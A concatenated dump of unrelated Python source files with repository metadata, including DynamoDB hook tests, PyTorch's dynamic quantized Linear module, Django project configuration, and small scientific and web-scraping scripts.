rs = ResultSet(conn, Limit())
results = list(rs)
self.assertEqual(results, items)
class TestHooks(BaseSystemTest):
""" Tests for connection callback hooks """
def tearDown(self):
super(TestHooks, self).tearDown()
for hooks in six.itervalues(self.dynamo._hooks):
while hooks:
hooks.pop()
def test_precall(self):
""" precall hooks are called before an API call """
hook = MagicMock()
self.dynamo.subscribe('precall', hook)
def throw(**_):
""" Throw an exception to terminate the request """
raise Exception()
with patch.object(self.dynamo, 'client') as client:
client.describe_table.side_effect = throw
with self.assertRaises(Exception):
self.dynamo.describe_table('foobar')
hook.assert_called_with(
self.dynamo, 'describe_table', {
'TableName': 'foobar'})
def test_postcall(self):
""" postcall hooks are called after API call """
hash_key = DynamoKey('id')
self.dynamo.create_table('foobar', hash_key=hash_key)
calls = []
def hook(*args):
""" Log the call into a list """
calls.append(args)
self.dynamo.subscribe('postcall', hook)
self.dynamo.describe_table('foobar')
self.assertEqual(len(calls), 1)
args = calls[0]
self.assertEqual(len(args), 4)
conn, command, kwargs, response = args
self.assertEqual(conn, self.dynamo)
self.assertEqual(command, 'describe_table')
self.assertEqual(kwargs['TableName'], 'foobar')
self.assertEqual(response['Table']['TableName'], 'foobar')
def test_capacity(self):
""" capacity hooks are called whenever response has ConsumedCapacity """
hash_key = DynamoKey('id')
self.dynamo.create_table('foobar', hash_key=hash_key)
hook = MagicMock()
self.dynamo.subscribe('capacity', hook)
with patch.object(self.dynamo, 'client') as client:
client.scan.return_value = {
'Items': [],
'ConsumedCapacity': {
'TableName': 'foobar',
'CapacityUnits': 4,
}
}
rs = self.dynamo.scan('foobar')
list(rs)
cap = ConsumedCapacity('foobar', Capacity(4, 0))
hook.assert_called_with(self.dynamo, 'scan', ANY, ANY, cap)
def test_subscribe(self):
""" Can subscribe and unsubscribe from hooks """
hook = object()
self.dynamo.subscribe('precall', hook)
self.assertEqual(len(self.dynamo._hooks['precall']), 1)
self.dynamo.unsubscribe('precall', hook)
self.assertEqual(len(self.dynamo._hooks['precall']), 0)
|
[
"stevearc@stevearc.com"
] |
stevearc@stevearc.com
|
1cb4aefd9a5b1077a5c844f51cf26e0e25ef605b
|
f6761bd4b74ed9c3bc0e8f62e5a1db70c03096f0
|
/torch/nn/quantized/dynamic/modules/linear.py
|
7574dd53eb761570aa1b6445bc8593eba60de6c2
|
[
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
MarisaKirisame/pytorch
|
b638790a0997d776ad4c5e4c77badc77e5dc94f9
|
59c5de4d0eda8d4f5494602034093933600d0a3d
|
refs/heads/master
| 2021-06-19T10:44:33.846286
| 2019-10-31T22:56:55
| 2019-10-31T22:58:28
| 218,881,408
| 2
| 0
|
NOASSERTION
| 2019-11-01T00:02:51
| 2019-11-01T00:02:51
| null |
UTF-8
|
Python
| false
| false
| 3,423
|
py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import torch
from ....modules.linear import Linear as NNLinear
import torch.nn.quantized as nnq
class Linear(nnq.Linear):
r"""
A dynamic quantized linear module with quantized tensor as inputs and outputs.
We adopt the same interface as `torch.nn.Linear`, please see
https://pytorch.org/docs/stable/nn.html#torch.nn.Linear for documentation.
Similar to :class:`torch.nn.Linear`, attributes will be randomly
initialized at module creation time and will be overwritten later
Attributes:
weight (Tensor): the non-learnable quantized weights of the module which are of
shape :math:`(\text{out\_features}, \text{in\_features})`.
bias (Tensor): the non-learnable bias of the module of shape :math:`(\text{out\_features})`.
If :attr:`bias` is ``True``, the values are initialized to zero.
Examples::
>>> m = nn.quantized.dynamic.Linear(20, 30)
>>> input = torch.randn(128, 20)
>>> output = m(input)
>>> print(output.size())
torch.Size([128, 30])
"""
def __init__(self, in_features, out_features, bias_=True):
super(Linear, self).__init__(in_features, out_features, bias_)
# We don't muck around with buffers or attributes or anything here
# to keep the module simple. *everything* is simply a Python attribute.
# Serialization logic is explicitly handled in the below serialization and
# deserialization modules
def forward(self, x):
# Note that we can handle self.bias == None case.
Y = torch.ops.quantized.linear_dynamic(
x, self._packed_params)
return Y.to(x.dtype)
def _get_name(self):
return 'DynamicQuantizedLinear'
def extra_repr(self):
return 'in_features={}, out_features={}'.format(
self.in_features, self.out_features
)
@classmethod
def from_float(cls, mod):
r"""Create a dynamic quantized module from a float module or qparams_dict
Args:
mod (Module): a float module, either produced by torch.quantization
utilities or provided by the user
"""
assert type(mod) == NNLinear, 'nn.quantized.dynamic.Linear.from_float only works for nn.Linear'
assert hasattr(mod, 'qconfig'), 'Input float module must have qconfig defined'
if mod.qconfig is not None and mod.qconfig.weight is not None:
weight_observer = mod.qconfig.weight()
else:
# We have the circular import issues if we import the qconfig in the beginning of this file:
# https://github.com/pytorch/pytorch/pull/24231. The current workaround is to postpone the
# import until we need it.
from torch.quantization.qconfig import default_dynamic_qconfig
weight_observer = default_dynamic_qconfig.weight()
assert weight_observer.dtype == torch.qint8, 'Weight observer must have dtype torch.qint8'
weight_observer(mod.weight)
wt_scale, wt_zp = weight_observer.calculate_qparams()
qweight = torch.quantize_per_tensor(mod.weight.float(), float(wt_scale), int(wt_zp), torch.qint8)
qlinear = Linear(mod.in_features, mod.out_features)
qlinear.set_weight_bias(qweight, mod.bias)
return qlinear
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
c4f1e1e1f8733b767ee1c04540805b7abc0a0d9b
|
5329cfea55404d9bbff223d761f06e2ec27c1ab7
|
/djangonautic/manage.py
|
6b1f7568039bef8fb496997b55bbbb4df8431254
|
[] |
no_license
|
rohit1717/articles-django-
|
c2d6fe202d62b1c3b56bec25f896fced23247f53
|
669e7186cc1b26b70f87ee8c4b782d0743c5bd8a
|
refs/heads/master
| 2022-12-02T21:44:50.231428
| 2020-08-20T17:54:22
| 2020-08-20T17:54:22
| 289,074,266
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 809
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangoautic.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
[
"rohitsingh17172000@gmail.com"
] |
rohitsingh17172000@gmail.com
|
90b90c1af562cd40a9888489a3719f6af2d1acba
|
eaad714626b105134a8b6d4d6e316a6aab1e436a
|
/prayas/prayas/urls.py
|
ff37d21e139ea46ca9594cf2875e381e45598a70
|
[] |
no_license
|
pradeeppc/Elearning-Web-App
|
967070e130249423b98111de62269ea8e4fd2312
|
49aeb430b5fecccd49d2a9e9332fcd8f138662a4
|
refs/heads/master
| 2023-03-21T15:28:52.565546
| 2021-03-13T15:16:24
| 2021-03-13T15:16:24
| 149,626,491
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,359
|
py
|
"""prayas URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from django.contrib.auth import views as auth_views
from courses.views import CourseListView
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('accounts/login/', auth_views.LoginView.as_view(), name='login'),
path('accounts/logout/', auth_views.LogoutView.as_view(), name='logout'),
path('admin/', admin.site.urls),
path('course/', include('courses.urls')),
path('', CourseListView.as_view(), name='course_list'),
path('students/', include('students.urls')),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
|
[
"pradeeep765@gmail.com"
] |
pradeeep765@gmail.com
|
094f154dc9007753efa071553ad662baa9cb66f4
|
9ae6ce54bf9a2a86201961fdbd5e7b0ec913ff56
|
/google/ads/googleads/v10/enums/types/matching_function_operator.py
|
11a366438b14b5a9625600a5fa27c1e72a1abe49
|
[
"Apache-2.0"
] |
permissive
|
GerhardusM/google-ads-python
|
73b275a06e5401e6b951a6cd99af98c247e34aa3
|
676ac5fcb5bec0d9b5897f4c950049dac5647555
|
refs/heads/master
| 2022-07-06T19:05:50.932553
| 2022-06-17T20:41:17
| 2022-06-17T20:41:17
| 207,535,443
| 0
| 0
|
Apache-2.0
| 2019-09-10T10:58:55
| 2019-09-10T10:58:55
| null |
UTF-8
|
Python
| false
| false
| 1,228
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v10.enums",
marshal="google.ads.googleads.v10",
manifest={
"MatchingFunctionOperatorEnum",
},
)
class MatchingFunctionOperatorEnum(proto.Message):
r"""Container for enum describing matching function operator."""
class MatchingFunctionOperator(proto.Enum):
r"""Possible operators in a matching function."""
UNSPECIFIED = 0
UNKNOWN = 1
IN = 2
IDENTITY = 3
EQUALS = 4
AND = 5
CONTAINS_ANY = 6
__all__ = tuple(sorted(__protobuf__.manifest))
|
[
"noreply@github.com"
] |
GerhardusM.noreply@github.com
|
8677a029b2db44ceafb04e7963b4cf60db2cacb9
|
532fdd01a9080d9980c18a68789b45b207e68550
|
/aaltomood/urls.py
|
ff8e5a84280efce7778b11e53cf5e51f08288ade
|
[] |
no_license
|
tonipel/aaltomood
|
3b85fe73b2b7bdf7eabcb591db33da276506871c
|
3ef2fb7ee65a166d1c6e7960b6f492dab951625e
|
refs/heads/master
| 2023-01-05T19:26:23.083041
| 2020-11-07T22:06:14
| 2020-11-07T22:06:14
| 310,659,482
| 0
| 0
| null | 2020-11-07T11:47:03
| 2020-11-06T17:12:37
|
Python
|
UTF-8
|
Python
| false
| false
| 913
|
py
|
"""aaltomood URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
from django.contrib.auth import views as auth_views
urlpatterns = [
path('mood/', include('mood.urls')),
path('admin/', admin.site.urls),
path('accounts/', include('django.contrib.auth.urls')),
]
|
[
"toni.pellinen@hotmail.com"
] |
toni.pellinen@hotmail.com
|
acd099225a02f96c7d3c8ff511a976350a843ec3
|
55610cce405fd4f2809bd7d26b4f19b9c2b1d3cd
|
/make_up/migrations/0002_makeuptask_student.py
|
718d9dd7a33b84b0bdd3e99ef57ad00ce51b2c8a
|
[] |
no_license
|
zzzzty/jtdx
|
30d648cf06f259dfb55227a1fb64b74a24afdd85
|
4486d9073416b7df8b93ac47d1b29256a4dff260
|
refs/heads/master
| 2020-06-07T14:02:02.074749
| 2019-12-26T07:46:40
| 2019-12-26T07:46:40
| 193,014,124
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 525
|
py
|
# Generated by Django 2.2.2 on 2019-07-06 07:34
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('student', '0002_student_nick_name'),
('make_up', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='makeuptask',
name='student',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='student.Student'),
),
]
|
[
"zzzliusong@163.com"
] |
zzzliusong@163.com
|
13feaddae7e89a0fa743ed4afd4a49c1ec6a1f26
|
1701f11946debbca91708f5bb69c494cfbb4fb7a
|
/benwillkommen/benwillkommen/settings.py
|
2f2127bf772da4463f293c31c43a29727963d930
|
[] |
no_license
|
benwillkommen/benwillkommen.com
|
4b3f8515c83a51e13023a402dd79d4759baee3b9
|
b00041d67f910435cc8b9f5d364e1e282cee9775
|
refs/heads/master
| 2020-05-18T18:01:54.760330
| 2014-03-16T03:20:44
| 2014-03-16T03:20:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,549
|
py
|
# Django settings for benwillkommen project.
#modification for playing w/ git
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'benwillkommen', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': '',
'PASSWORD': '',
'HOST': 'localhost', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
'TIME_ZONE': 'US/Central'
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'US/Central'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = False
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'j36b4t9$fx#^qmy8nx$*219vsbnp%dp+9yoj3^*#td$^3!i!ah'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'benwillkommen.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'benwillkommen.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
# 'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
[
"benwillkommen@gmail.com"
] |
benwillkommen@gmail.com
|
e9734d05b7e16399760fe649e8c74a4afdef02c4
|
c8b5d05ff16d422ec05addb99f208467f01fa373
|
/tests/Character_tests.py
|
c1133329199065c0a91a490c00f3c6fc7b34fcab
|
[] |
no_license
|
PreslavaKuzova/Dungeons-And-Pythons
|
298105ba51ef4a10e35461c3fcef5818d0934b53
|
5629e63a09a34e5e820383da0509cb67147ec19d
|
refs/heads/master
| 2020-05-07T11:05:20.120814
| 2019-04-15T14:37:42
| 2019-04-15T14:37:42
| 180,445,498
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,138
|
py
|
import unittest
import os, sys
sys.path.insert(0, '../')
from Character import *
class HeroTests(unittest.TestCase):
def test_init_value(self):
c = Character(20)
self.assertEqual(c.get_health(), 20)
def test_when_damage_is_taken_and_substract_that_much_from_the_health(self):
c = Character(100)
c.take_damage(20)
self.assertEqual(c.get_health(), 80)
def test_when_damage_taken_is_more_that_the_health_then_health_equals_zero(self):
c = Character(50)
c.take_damage(60)
self.assertEqual(c.get_health(), 0)
def test_when_damage_taken_is_more_that_the_health_then_character_is_dead(self):
c = Character(50)
c.take_damage(60)
self.assertFalse(c.is_alive())
def test_when_damage_taken_is_less_that_the_health_then_character_is_dead(self):
c = Character(60)
c.take_damage(50)
self.assertTrue(c.is_alive())
def test_when_starting_with_no_health_and_test_whether_it_is_alive(self):
c = Character(0)
self.assertFalse(c.is_alive())
if __name__ =='__main__':
unittest.main()
|
[
"preslava.kuzova@gmail.com"
] |
preslava.kuzova@gmail.com
|
cdd78006ece1d3fe85d569ed5cd2713d6c9d3dc0
|
b5abb217826b531c8f4c24c74df5620cf89234e0
|
/tutorial/quickstart/views/wavsViews.py
|
96d52c59b977477927374207b08abe16e53cc95d
|
[] |
no_license
|
zhwj2015/speech
|
bedf80c2842b3c344cd1932ba22b71ecaddb84dc
|
5155a45b088acaca6988e910927197e2da71f556
|
refs/heads/master
| 2016-09-06T09:53:05.564149
| 2015-07-08T00:14:27
| 2015-07-08T00:14:27
| 37,200,594
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,167
|
py
|
__author__ = 'Administor'
from rest_framework import viewsets
from tutorial.quickstart.models import Wavs, Users
from tutorial.quickstart.serializers import WavsSerializer
from rest_framework.response import Response
import os
from rest_framework.renderers import JSONRenderer
from django.utils.six import BytesIO
from rest_framework.parsers import JSONParser
from tutorial.quickstart.util import Util, JSONResponse
class WavsViews(viewsets.ModelViewSet):
queryset = Wavs.objects.all()
serializer_class = WavsSerializer
def create(self, request, *args, **kwargs):
try:
pass
# filename = request.data['wavs'].name
# suffix=filename[filename.find('.'):]
# name = Util.getTimestamp()
# filename = str(name)+str(suffix)
# path = 'wavs/'+filename
# user_id = request.data['uid']
# user = Users.objects.all().get(user_id=user_id)
# created = request.data['created']
# created = Util.strToTime(created,'%Y-%m-%d')
#
# if not os.path.exists('wavs/'):
# os.makedirs('wavs/')
# out = open(path, 'wb+')
# infile = request.data['wavs']
# for chunk in infile.chunks():
# out.write(chunk)
# out.flush()
# out.close()
# wav = Wavs(wav_id=name, name=filename, path=path, user_id=user, created=created, score=0)
# serializer = WavsSerializer(wav)
# json = JSONRenderer().render(serializer.data)
# stream = BytesIO(json)
# data = JSONParser().parse(stream)
# serializer = WavsSerializer(data=data)
# #object to JSON
# # data = Util.serializeToJSON(serializer)
# #
# # serializer = WavsSerializer(data=data)
# if serializer.is_valid():
# wav.save()
# else:
# return JSONResponse({'status': False})
except Exception, e:
print "error"
return JSONResponse({'status': False})
return JSONResponse({'status': True})
|
[
"1654339276@qq.com"
] |
1654339276@qq.com
|
363ece98f426ed769e0ca2315c020c8c4b8a79e2
|
8a18444ba20243cc0d1318efc2c06fbe3c8fbdba
|
/All_Template_Export/All_Templates_Export.py
|
1a54ddb853f88909850fda054c7c5fd77f2f731f
|
[] |
no_license
|
Aqumik/Zabbix-API
|
9157676b03b62e79a22f6c5161a9063137a0fac2
|
6670d58a871a7dc3f3f9dbfe443eff74cce14af9
|
refs/heads/main
| 2023-02-28T21:45:16.430836
| 2021-01-29T08:20:16
| 2021-01-29T08:20:16
| 334,079,762
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,445
|
py
|
# -*- coding:UTF-8 -*-
# @aqumik 2021-1-29 Python3 导出Zabbix所有模板,虽然xml格式有点难看,但是直接导入到服务器就可使用!!
# 具体参数可以查看注释,SSL直接使用了False
import json
import requests
class Zabbix(object):
def __init__(self,url,header,user,password):
self.url = url
self.header = header
self.id = 0
self.user = user
self.password = password
# def get_auth(self):
# req = json.dumps(
# {
# "jsonrpc": "2.0",
# "method": "user.login",
# "params": {
# "user": "Admin",
# "password": "zabbix"
# },
# "id": 0
# }
# )
# ret = requests.post(url=self.url, data=req, headers=self.header).json()
# ret = ret['result']
# authid = ret
# print(authid)
# 验证模块,提交的json验证都在此处
def json_obj(self,method,auth=True,params={}):
obj = {
"jsonrpc": "2.0",
"method": method,
"params": params,
'auth':auth,
"id":self.id
}
# 需要删除后才能json格式化请求,否则无法删除 auth
if not auth:
del obj["auth"]
obj = json.dumps(obj)
return obj
# 登陆模块
def user_login(self):
data = self.json_obj(method="user.login",auth=False,params={"user":self.user,"password":self.password})
req = requests.post(url=self.url,headers=self.header,data=data,verify=False)
req = req.json()['result']
return req
# 退出模块
def user_logout(self,auth):
# auth = self.user_login()
print('********退出模块,认证id',auth)
data = self.json_obj(method="user.logout",auth=auth,params={})
req = requests.post(url=self.url,headers=self.header,data=data,verify=False)
if req.json()['result'] == True:
print('退出成功')
else:
print('退出失败')
return req.text
# 获取所有模板id
def all_template_get(self,auth=True):
print('all_template_get获取到认证id',auth)
data = self.json_obj(method="template.get",auth=auth,
params={
"output": [
"host",
"templateid"
]
})
req = requests.post(url=self.url,headers=self.header,data=data,verify=False)
print(req.json()['result'])
# self.user_logout(auth=auth)
#返回值是所有模板名字+id的数组
return req.json()['result']
#导出所有模板
def all_template_xml(self,auth):
# auth = self.user_login()
all_template_get = self.all_template_get(auth=auth)
for tempalte in all_template_get:
template_name = tempalte['host']
template_id = str(tempalte['templateid'])
print('*********模板名字:%s, id:%s' % (template_name, template_id))
data = self.json_obj(method="configuration.export",auth=auth,
params={
"options":{
"templates": [
template_id
]
},
"format": "xml"
})
req = requests.post(url=self.url,headers=self.header,data=data,verify=False).json()
req = req['result']
#将得到的xml文件输出
myxml = open(template_name+'.xml',mode='a',encoding='utf-8')
print(req,file=myxml)
myxml.close()
print(req)
print('****************all_template_xml获取到的auth',auth)
if __name__ == '__main__':
url = 'http://192.168.20.180/zabbix/api_jsonrpc.php'
header = {'Content-Type': 'application/json'}
user = 'Admin'
password = 'zabbix'
authid = Zabbix(url,header,user,password).user_login()
print(authid)
Zabbix(url, header,user,password).all_template_xml(authid)
Zabbix(url, header,user,password).user_logout(authid)
|
[
"noreply@github.com"
] |
Aqumik.noreply@github.com
|
bf23ff1ffbc40cacf8ba103e621f8ad641cd675f
|
1996a67d2a281706e9c141797e1813fc1b3612a7
|
/python/DNaseOverlap.py
|
b09fff46d97b9d18962c390ab47500ba50aaaf75
|
[] |
no_license
|
pjshort/SingletonMetric
|
91076a9976cc45a4ddf5f0750b20b7c46b7f1f5a
|
dc9af500c928b9d5b94aa75bc4b609e3feffe956
|
refs/heads/master
| 2021-01-10T06:20:49.350579
| 2016-03-07T11:12:25
| 2016-03-07T11:12:25
| 49,203,514
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,903
|
py
|
import pysam
import argparse
import sys
import os
def get_options():
""" get the command line options
"""
parser = argparse.ArgumentParser(description="Get CADD scores for set of alleles.")
parser.add_argument("--variants", default="/path/to/input/variants",
help="location of variants in chr\tpos\tref\talt (minimal vcf) format")
parser.add_argument("--variants_out", default=sys.stdout,
help="path to send the list of variants with DNASE overlap binary values.")
parser.add_argument("--roadmap_epigenome_ids", default = ["E002", "E010", "E053", "E072", "E081", "E082", "E083"],
help = "list of roadmap epigenome project ideas in form E###.")
args = parser.parse_args()
return args
def get_variants(variants_path):
chr = []
pos = []
ref = []
alt = []
with open(variants_path, "r") as myvariants:
myvariants.readline() # skip the header
for line in myvariants:
line = line.split("\t")
chr.append(line[0])
pos.append(int(line[1]))
ref.append(line[2])
alt.append(line[3].rstrip())
return chr, pos, ref, alt
def check_dnase_overlap(chr, pos, ref, alt, id, TABIX_DIR):
tabixfile = pysam.Tabixfile(TABIX_DIR + "regions_enh_%s.bed.gz" % id) # e.g. E081 is male fetal brain
overlap = []
for c, p, r, a in zip(chr, pos, ref, alt):
t = tabixfile.fetch("chr" + c, p-1, p)
if len(list(t)) > 0: # overlaps entry
overlap.append(1)
else: # no overlap
overlap.append(0)
return overlap
if __name__ == "__main__":
args = get_options()
chr, pos, ref, alt = get_variants(args.variants)
TABIX_DIR = "/lustre/scratch113/projects/ddd/users/ps14/REP/"
try:
id_list = [line.rstrip() for line in open(args.roadmap_epigenome_ids)]
except NameError:
pass # take default (brain and brain developmental tissues)
overlap_list = []
i = 0
for id in id_list:
if not os.path.isfile("/lustre/scratch113/projects/ddd/users/ps14/REP/regions_enh_%s.bed.gz" % id):
print "No DNase Peaks for %s. Skipping and moving to the next tissue." % id
id_list.pop(i)
continue
print "Intersecting parental alleles with %s DNase peaks." % id
overlap = check_dnase_overlap(chr, pos, ref, alt, id, TABIX_DIR)
overlap_list.append(overlap)
i += 1
myvariants = open(args.variants, "r")
variant_header = myvariants.readline().rstrip()
variants = myvariants.readlines()
#lines = [variants] + overlap_list
myfile = open(args.variants_out, 'w')
# write header
header = variant_header + "\t" + "\t".join(id_list) + "\n"
myfile.write(header)
# write lines
i = 0
for overlaps in zip(*overlap_list): # the * unpacks the list of lists
var = variants[i].rstrip()
myfile.write(var + "\t" + "\t".join(str(o) for o in overlaps) + "\n")
i += 1
print 'Finished!'
|
[
"pjshort42@gmail.com"
] |
pjshort42@gmail.com
|
e6c4f39cad3a7e6cc5c02477d45d515ac44f6b5b
|
060ff392f361e4141d7d2add4282cd8ec67d055d
|
/musify/asgi.py
|
bc02da036c98fd237532dccce5998c699977136b
|
[] |
no_license
|
omlondhe/ReactDjango-MusifyApp
|
cfe61d85bccd583a2b7658f33b234869af008143
|
4fe3a18b2a425df0a860dcbb572b3a51227779e9
|
refs/heads/main
| 2023-02-06T01:54:31.279052
| 2020-12-28T17:51:31
| 2020-12-28T17:51:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 389
|
py
|
"""
ASGI config for musify project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'musify.settings')
application = get_asgi_application()
|
[
"oplondhe@gmail.com"
] |
oplondhe@gmail.com
|
044b8d3b432a0465426ab35095611881bb8b52c6
|
3fd76a49e0cb7dedd0113abc9fe25d49c96c7610
|
/demo01.py
|
d6d8258fd3c34de89cf6138bf25e91de3f42e6dd
|
[] |
no_license
|
SnowSuo/python
|
4fd51a970139a1eff0097a03534af40e091f3497
|
bbf6691efdfaacd93d674160dc2cd3a03f3e9f6e
|
refs/heads/master
| 2021-07-02T09:10:50.063051
| 2018-06-19T12:49:31
| 2018-06-19T12:49:31
| 130,447,868
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,053
|
py
|
#-*- coding:utf-8 -*-
'''
=============================
获取豆瓣读书榜单,并将获取数据已json文件格式持久化保存
@copyright:Chinasoft international .ETC
@author:SnowSuo
@date:2018-05-02
'''
#导入模块
import urllib.request
import re
import os
import json
#获取网页地址
url='https://book.douban.com/top250?icn=index-book250-all'
response=urllib.request.urlopen(url)
content=response.read().decode('utf-8')
#拆分所需的字符串,定义正则表达式
regcontent=re.compile(r'<tr class="item">(.*?)</tr>',re.S)
regTitle=re.compile(r'<div class="pl2"><a.*?title="(.*?)">')
regLinks=re.compile(r'<a href="(.*?)".*?>')
regRatings=re.compile(r'<span class="rating_nums">(.*?)</span>')
regprice=re.compile(r'<p class="pl">(.*?)</p>')
lstcontent=regcontent.findall(content)
#创建一个列表对象,存放数据
data=[]
for item in lstcontent:
#去掉多余空格
regExp=re.compile(r'[\s\n]{2,}')
#blockcode=regExp.sub('',item)
